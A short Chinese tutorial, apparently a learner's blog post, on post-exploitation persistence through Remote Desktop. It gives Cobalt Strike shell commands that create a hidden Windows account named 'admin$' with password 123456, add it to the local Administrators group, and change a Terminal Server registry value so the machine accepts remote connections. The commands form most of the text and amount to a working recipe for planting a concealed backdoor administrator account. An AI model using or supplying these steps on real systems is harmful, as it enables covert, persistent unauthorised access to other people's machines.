内网渗透–远程桌面
前言
学代码审计有些枯燥,加上俺内网啥也不会,学学内网换换口味。
隐藏用户的创建
因为在Windows环境下创建用户后面如果带入一个“$"符号,在net user时默认是不显示的。
利用条件:获得管理员权限
首先在cs中输入以下命令
shell net user admin$ 123456 /add
shell net localgroup administrators admin$ /add
第一句是创建一个admin$用户密码为123456.第二句是将用户加入管理组。
我们来验证一下,使用net user命令并无admin用户
然后远程打开3389端口。
reg add “HKLM\SYSTEM\CURRENT\CONTROLSET\CONTROL\TERMINAL SERVER” /v fSingleSessionPerUser /t REG_DWORD /d 0 /f
现在已经可以远程连接了,但是中用户组中依然可以看见admin$